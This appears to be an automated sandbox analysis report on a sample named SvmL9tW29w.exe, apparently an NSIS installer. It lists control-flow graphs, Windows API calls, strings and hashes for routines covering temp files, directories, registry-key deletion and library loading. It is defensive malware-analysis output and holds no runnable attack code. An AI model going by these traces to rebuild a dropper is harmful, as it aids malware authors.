                                                              • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                              • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                              • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 496 40618a-406195 497 406197-4061a6 496->497 498 4061a8-4061be 496->498 497->498 499 4061c4-4061cf 498->499 500 4063af-4063b3 498->500 499->500 501 4061d5-4061dc 499->501 502 4061e1-4061eb 500->502 503 4063b9-4063c3 500->503 501->500 502->503 506 4061f1-4061f8 502->506 504 4063c5-4063c9 call 4060f7 503->504 505 4063ce-4063cf 503->505 504->505 508 4063a2 506->508 509 4061fe-406232 506->509 510 4063a4-4063aa 508->510 511 4063ac-4063ae 508->511 512 406238-406242 509->512 513 40634f-406352 509->513 510->500 511->500 514 406244-406248 512->514 515 40625c 512->515 516 406382-406385 513->516 517 406354-406357 513->517 514->515 523 40624a-40624e 514->523 520 406263-40626a 515->520 521 406393-4063a0 lstrlenA 516->521 522 406387-40638e call 40618a 516->522 518 406367-406373 call 4060f7 517->518 519 406359-406365 call 406055 517->519 534 406378-40637e 518->534 519->534 525 40626c-40626e 520->525 526 40626f-406271 520->526 521->500 522->521 523->515 529 406250-406254 523->529 525->526 532 406273-40628e call 405fde 526->532 533 4062aa-4062ad 526->533 529->515 530 406256-40625a 529->530 530->520 539 406293-406296 532->539 537 4062bd-4062c0 533->537 538 4062af-4062bb GetSystemDirectoryA 533->538 534->521 536 406380 534->536 540 406347-40634d call 4063d2 536->540 542 4062c2-4062d0 GetWindowsDirectoryA 537->542 543 40632d-40632f 537->543 541 406331-406334 538->541 544 406336-40633a 539->544 545 40629c-4062a5 call 40618a 539->545 540->521 541->540 541->544 542->543 543->541 546 4062d2-4062dc 543->546 544->540 551 40633c-406342 lstrcatA 544->551 545->541 548 4062f6-40630c SHGetSpecialFolderLocation 546->548 549 4062de-4062e1 546->549 554 40632a 548->554 555 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 548->555 549->548 553 4062e3-4062ea 549->553 551->540 557 4062f2-4062f4 553->557 554->543 555->541 555->554 557->541 557->548
                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                              • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                              • SHGetSpecialFolderLocation.SHELL32(00405256,771B23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                              • SHGetPathFromIDListA.SHELL32(771B23A0,Call), ref: 00406312
                                                              • CoTaskMemFree.OLE32(771B23A0), ref: 0040631E
                                                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                              • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,771B23A0), ref: 00406394
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 717251189-1230650788
                                                              • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                              • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                              • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                              • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 627 401759-40177c call 402bce call 405afc 632 401786-401798 call 4060f7 call 405a8f lstrcatA 627->632 633 40177e-401784 call 4060f7 627->633 638 40179d-4017a3 call 4063d2 632->638 633->638 643 4017a8-4017ac 638->643 644 4017ae-4017b8 call 40646b 643->644 645 4017df-4017e2 643->645 653 4017ca-4017dc 644->653 654 4017ba-4017c8 CompareFileTime 644->654 646 4017e4-4017e5 call 405c6b 645->646 647 4017ea-401806 call 405c90 645->647 646->647 655 401808-40180b 647->655 656 40187e-4018a7 call 40521e call 4030d8 647->656 653->645 654->653 657 401860-40186a call 40521e 655->657 658 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 655->658 668 4018a9-4018ad 656->668 669 4018af-4018bb SetFileTime 656->669 670 401873-401879 657->670 658->643 690 401855-401856 658->690 668->669 672 4018c1-4018cc CloseHandle 668->672 669->672 673 402a63 670->673 675 4018d2-4018d5 672->675 676 402a5a-402a5d 672->676 677 402a65-402a69 673->677 679 4018d7-4018e8 call 40618a lstrcatA 675->679 680 4018ea-4018ed call 40618a 675->680 676->673 687 4018f2-402382 679->687 680->687 691 402387-40238c 687->691 692 402382 call 405813 687->692 690->670 693 401858-401859 690->693 691->677 692->691 693->657
                                                              APIs
                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,?), ref: 00401798
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,?), ref: 004017C2
                                                                • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Monoscelans Setup,NSIS Error,?,?,?,?), ref: 00406104
                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp$C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                              • API String ID: 1941528284-2252240522
                                                              • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                              • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                              • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                              • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 694 4030d8-4030ec 695 4030f5-4030fe 694->695 696 4030ee 694->696 697 403100 695->697 698 403107-40310c 695->698 696->695 697->698 699 40311c-403129 call 4032ea 698->699 700 40310e-403117 call 403300 698->700 704 4032d8 699->704 705 40312f-403133 699->705 700->699 706 4032da-4032db 704->706 707 403283-403285 705->707 708 403139-403182 GetTickCount 705->708 711 4032e3-4032e7 706->711 709 4032c5-4032c8 707->709 710 403287-40328a 707->710 712 4032e0 708->712 713 403188-403190 708->713 714 4032ca 709->714 715 4032cd-4032d6 call 4032ea 709->715 710->712 716 40328c 710->716 712->711 717 403192 713->717 718 403195-4031a3 call 4032ea 713->718 714->715 715->704 726 4032dd 715->726 720 40328f-403295 716->720 717->718 718->704 728 4031a9-4031b2 718->728 723 403297 720->723 724 403299-4032a7 call 4032ea 720->724 723->724 724->704 732 4032a9-4032b5 call 405d37 724->732 726->712 730 4031b8-4031d8 call 406625 728->730 735 40327b-40327d 730->735 736 4031de-4031f1 GetTickCount 730->736 738 4032b7-4032c1 732->738 739 40327f-403281 732->739 735->706 740 4031f3-4031fb 736->740 741 403236-403238 736->741 738->720 742 4032c3 738->742 739->706 743 403203-403233 MulDiv wsprintfA call 40521e 740->743 744 4031fd-403201 740->744 745 40323a-40323e 741->745 746 40326f-403273 741->746 742->712 743->741 744->741 744->743 749 403240-403247 call 405d37 745->749 750 403255-403260 745->750 746->713 747 403279 746->747 747->712 755 40324c-40324e 749->755 753 403263-403267 750->753 753->730 754 40326d 753->754 754->712 755->739 756 403250-403253 755->756 756->753
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: ... %d%%$HBB
                                                              • API String ID: 551687249-372310663
                                                              • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                              • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                              • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                              • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                              Control-flow Graph

                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E38
                                                              • GetDeviceCaps.GDI32(00000000,?), ref: 00401E52
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                              • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID: Calibri
                                                              • API String ID: 3808545654-1409258342
                                                              • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                              • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                              • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                              • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 766 4056e4-40572f CreateDirectoryA 767 405731-405733 766->767 768 405735-405742 GetLastError 766->768 769 40575c-40575e 767->769 768->769 770 405744-405758 SetFileSecurityA 768->770 770->767 771 40575a GetLastError 770->771 771->769
                                                              APIs
                                                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405727
                                                              • GetLastError.KERNEL32 ref: 0040573B
                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                              • GetLastError.KERNEL32 ref: 0040575A
                                                              Strings
                                                              • C:\Users\user\Desktop, xrefs: 004056E4
                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040570A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                                                              • API String ID: 3449924974-2752704311
                                                              • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                              • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                              • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                              • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 772 406492-4064b2 GetSystemDirectoryA 773 4064b4 772->773 774 4064b6-4064b8 772->774 773->774 775 4064c8-4064ca 774->775 776 4064ba-4064c2 774->776 778 4064cb-4064fd wsprintfA LoadLibraryExA 775->778 776->775 777 4064c4-4064c6 776->777 777->778
                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                              • wsprintfA.USER32 ref: 004064E2
                                                              • LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004064F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%s.dll$UXTHEME$\
                                                              • API String ID: 2200240437-4240819195
                                                              • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                              • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                              • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                              • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 779 405cbf-405cc9 780 405cca-405cf5 GetTickCount GetTempFileNameA 779->780 781 405d04-405d06 780->781 782 405cf7-405cf9 780->782 784 405cfe-405d01 781->784 782->780 783 405cfb 782->783 783->784
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405CD3
                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,?,?,?), ref: 00405CED
                                                              Strings
                                                              • "C:\Users\user\Desktop\SvmL9tW29w.exe", xrefs: 00405CBF
                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CC2
                                                              • nsa, xrefs: 00405CCA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: "C:\Users\user\Desktop\SvmL9tW29w.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-1708740036
                                                              • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                              • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                              • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                              • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 785 402cd0-402cf9 call 405f7d 787 402cfe-402d02 785->787 788 402db3-402db7 787->788 789 402d08-402d0c 787->789 790 402d31-402d44 789->790 791 402d0e-402d2f RegEnumValueA 789->791 793 402d6d-402d74 RegEnumKeyA 790->793 791->790 792 402d98-402da6 RegCloseKey 791->792 792->788 794 402d46-402d48 793->794 795 402d76-402d88 RegCloseKey call 406500 793->795 794->792 796 402d4a-402d5e call 402cd0 794->796 801 402da8-402dae 795->801 802 402d8a-402d96 RegDeleteKeyA 795->802 796->795 803 402d60-402d6c 796->803 801->788 802->788 803->793
                                                              APIs
                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                              • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                              • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                              • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 804 742f16db-742f1717 call 742f1a98 808 742f171d-742f1721 804->808 809 742f1834-742f1836 804->809 810 742f172a-742f1737 call 742f22f1 808->810 811 742f1723-742f1729 call 742f22af 808->811 816 742f1739-742f173e 810->816 817 742f1767-742f176e 810->817 811->810 820 742f1759-742f175c 816->820 821 742f1740-742f1741 816->821 818 742f178e-742f1792 817->818 819 742f1770-742f178c call 742f24d8 call 742f1559 call 742f1266 GlobalFree 817->819 825 742f17dc-742f17e2 call 742f24d8 818->825 826 742f1794-742f17da call 742f156b call 742f24d8 818->826 842 742f17e3-742f17e7 819->842 820->817 827 742f175e-742f175f call 742f2cc3 820->827 823 742f1749-742f174a call 742f2a38 821->823 824 742f1743-742f1744 821->824 838 742f174f 823->838 831 742f1746-742f1747 824->831 832 742f1751-742f1757 call 742f26b2 824->832 825->842 826->842 835 742f1764 827->835 831->817 831->823 841 742f1766 832->841 835->841 838->835 841->817 847 742f17e9-742f17f7 call 742f249e 842->847 848 742f1824-742f182b 842->848 854 742f180f-742f1816 847->854 855 742f17f9-742f17fc 847->855 848->809 850 742f182d-742f182e GlobalFree 848->850 850->809 854->848 857 742f1818-742f1823 call 742f14e2 854->857 855->854 856 742f17fe-742f1806 855->856 856->854 858 742f1808-742f1809 FreeLibrary 856->858 857->848 858->854
                                                              APIs
                                                                • Part of subcall function 742F1A98: GlobalFree.KERNEL32(?), ref: 742F1D09
                                                                • Part of subcall function 742F1A98: GlobalFree.KERNEL32(?), ref: 742F1D0E
                                                                • Part of subcall function 742F1A98: GlobalFree.KERNEL32(?), ref: 742F1D13
                                                              • GlobalFree.KERNEL32(00000000), ref: 742F1786
                                                              • FreeLibrary.KERNEL32(?), ref: 742F1809
                                                              • GlobalFree.KERNEL32(00000000), ref: 742F182E
                                                                • Part of subcall function 742F22AF: GlobalAlloc.KERNEL32(?,?), ref: 742F22E0
                                                                • Part of subcall function 742F26B2: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,742F1757,00000000), ref: 742F2782
                                                                • Part of subcall function 742F156B: wsprintfA.USER32 ref: 742F1599
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                              • String ID:
                                                              • API String ID: 3962662361-3916222277
                                                              • Opcode ID: 6aa425c24467b677cae78a7f8b5510ad1b812b95a30953a1a55e99da13bc319f
